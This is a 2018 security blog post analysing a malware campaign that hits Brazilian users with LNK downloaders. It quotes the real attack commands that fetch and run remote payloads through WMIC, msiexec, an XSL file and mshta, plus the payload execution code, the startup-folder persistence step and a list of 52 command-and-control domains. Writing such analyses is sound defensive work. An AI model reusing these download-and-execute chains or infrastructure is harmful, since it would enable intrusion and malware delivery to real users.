Monday, 28 May 2018

LNK files targeting Brazilian Users

Recently, I observed a lot of LNK files crafted to target users located in Brazil. The details of this campaign are not documented anywhere and the final stage payloads (binary files) are not even present on public sources such as VirusTotal.

Interestingly, there are numerous references in the source code to characters from World of Warcraft in the form of variable names. The most important reference being: SABNOCK.

This campaign has been active for the past few months however they frequently keep updating.

The original attack vector is an LNK based Downloader sent inside a ZIP archive.

On 25th of May 2018, I observed an LNK file which leveraged WMIC to download the malicious MSI file.

Name of the LNK file: v114googlexx4.lnk
MD5 hash of the LNK file: ac212f8d998343e77edfab76cbf3656e
MD5 hash of the ZIP file: dadc0ec5a5460e8c30859cc6fc3d9d7a

Target of the LNK file: C:\WINDOWS\system32\wbem\WMIC.exe process call create "msiexec.exe /i hxxp://Hrncmxbvh.laguerra.yourtrap.com:25014/v120?lguet90da /q"

And on 27th of May 2018, I already observed a new variant which updated the way the next stage payloads are downloaded.

Name of the LNK file: suporte@grupoatarde.com.br.lnk
MD5 hash of the LNK file: e288ebcfcf2b5b10f774618de059d66b
MD5 hash of the ZIP file: 65f127944263a99c2834d8abf6d408ec

Target of the LNK file: C:\WINDOWS\system32\Wbem\WMIC.exe  os get /format:"hxxp://iusj666ru.charliepace.yourtrap.com:25071/v121?rbmzxmius"

This LNK file uses the technique of leveraging WMIC to download an XSL file which contains a script. This is possible by passing the command line parameter: "/format".

Geo IP check

It is important to note that the C&C Servers in this case use a Geo IP mechanism to ensure that the correct response is given only if the request is coming from the intended targeted region. In this case, the Geo IP check ensures that the request is coming from Brazil.

As an example, if I try to connect to the above URL using a non Brazil IP address, we can see that the Server returns a 404 Not Found Response as shown below:



Figure 1


I configured my TOR exit node to connect through Brazil. Now, when I attempt to connect to the above URL, it returns me the correct response as shown below:


Figure 2

XSL File Analysis

The main purpose of the XSL file in this case is to leverage mshta to download the malicious JavaScript file from the URL: http://vrx3152717.negan.sellclassics.com:25034/excx/?7475027111

    <![CDATA[
   
    var r = new ActiveXObject("WScript.Shell").Run('mshta.exe javascript:try{try{javascript:GetObject("script:ht"+"tp://vrx3152717.negan.sellclassics.com:25034/excx/?7475027111");self.close();}catch(e){}}catch(e){};self.close();');
    ]]>

SCT File Analysis

This is the main Scriptlet file which performs the following main actions:

1. Downloads the next stage payloads from randomly chosen domains.
2. Configures the system for persistence.
3. Executes the next stage payloads.

Random Domain Selection

radador() is a function in this SCT file which is used to generate a random number between the min and max range supplied to it as arguments.

pingadori is a random number generated in the range, 1 to 52.

Corresponding to each number, there is a domain name which will be used to fetch the next stage payloads.

The complete list of domains is mentioned in the Appendix.

Downloading the Modules

The function, Bxaki() will take two parameters.

URL -> The URL from which it needs to fetch the file.
File -> The path where the file needs to be downloaded

All the files will be downloaded to the directory: %userprofile%\tempwd

The downloaded URLs are constructed as shown below:

xVRXastaroth2 = "ht"+"tp://vrx"+radador(1111111,9999999)+"."+xVRXastaroth+":"+radador(25010,25099)+"/"+ smaeVar;

1. It generates a random number in the range, 1111111 to 9999999 and appends it to the string: "http://vrx".
2. It generates another random number in the range, 25010 to 25099. This is the port number.

So, the download URLs have both static and dynamic parts. The reason for generating these random numbers is to prevent detection of the network traffic. Although, since there are still some static parts in the URL, so it is possible detect on that basis.

Below is a summary of the different files downloaded and the corresponding URLs:

sysvw.lnk - Downloaded from the URL: xVRXastaroth2 +"inixv121.zip?"+radador(0000001,999999999)
SABNOCKXa.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXa.jpg.zip?"+radador(0000001,999999999)
SABNOCKXb.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXb.jpg.zip?"+radador(0000001,999999999)
SABNOCKXe.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXe.jpg.zip?"+radador(0000001,999999999)
SABNOCKXf.jpg - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXf.jpg.zip?"+radador(0000001,999999999)
SABNOCKXg.gif - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXg.gif.zip?"+radador(0000001,999999999)
SABNOCKXdwwn.gif - Downloaded from the URL: xVRXastaroth2 + "SABNOCKXdwwn.gif.zip?"+radador(0000001,999999999)
system64.exe - Downloaded from the URL: xVRXastaroth2 + "gerarhv121.php?"+radador(0000001,999999999)

system64.exe is the next stage payload which will be dropped and executed as shown below:

var xxWshShell = new ActiveXObject("WScript.Shell");
xxWshShell.run(sVarRaz+"\\system64.exe  /xy /"+radador(0000001,999999999),0,true);

This binary will be executed with the command line arguments: "/xy /<random_number>"

Persistence

The LNK file, sysvw.lnk is downloaded to the path: %userprofile%\tempwd\sysvw.lnk

This LNK file will be copied to the path: %appdata%\\microsoft\\windows\\start menu\\programs\\startup\\ for persistence.

The target of the LNK file is: C:\WINDOWS\explorer.exe /e,/start,system64.exe

It ensures that everytime the system is started, it will execute the system64.exe binary.

In the follow up blog post, I will share the details of the payload.

c0d3inj3cT

Appendix

List of Domains used to fetch the next stage Payload

aguerra.yourtrap.com
benjaminlinus.dumb1.com
boonecarlyle.onedumb.com
carl-grimes.dumb1.com
carol-peletier.mrbasic.com
charliepace.yourtrap.com
clairelittleton.youdontcare.com
daryl-dixon.2waky.com
dolar-99.sellclassics.com
dolar-pp.youdontcare.com
dotor-por.sellclassics.com
dotor-pot.jetos.com
eugene-porter.qpoe.com
filadel.dns05.com
flare.americanunfinished.com
flare87.isasecret.com
flare909.qpoe.com
flare910.dynamic-dns.net
glenn-rhee.fartit.com
hurleyreyes.zzux.com
jackshephard.longmusic.com
jamesford.dynamic-dns.net
jesse10.compress.to
johnlocke.wikaba.com
katherine.epac.to
lsetor900.jetos.com
maggie-greene.instanthq.com
michaeldawson.toythieves.com
michonne.ddns.info
mike-ehrmantraut.wikaba.com
morgan-jones.mymom.info
mrkowwiuy.dynamic-dns.net
negan.sellclassics.com
reboot.jungleheart.com
reboot05.qpoe.com
reboot43.jetos.com
reboot66.dns04.com
richardalpert.itemdb.com
rick-grimes.mrface.com
rosita-espinosa.zyns.com
sayidjarrah.compress.to
setor001.youdontcare.com
setor0po.yourtrap.com
setor543.itsaol.com
setor800.itemdb.com
sunhwakwon.2waky.com
token-14.sexxxy.biz
token-435.my03.com
token-56.zyns.com
token-8-0.youdontcare.com
token-890.zyns.com
tuco-salamanca.dynamic-dns.net  

No comments:

Post a Comment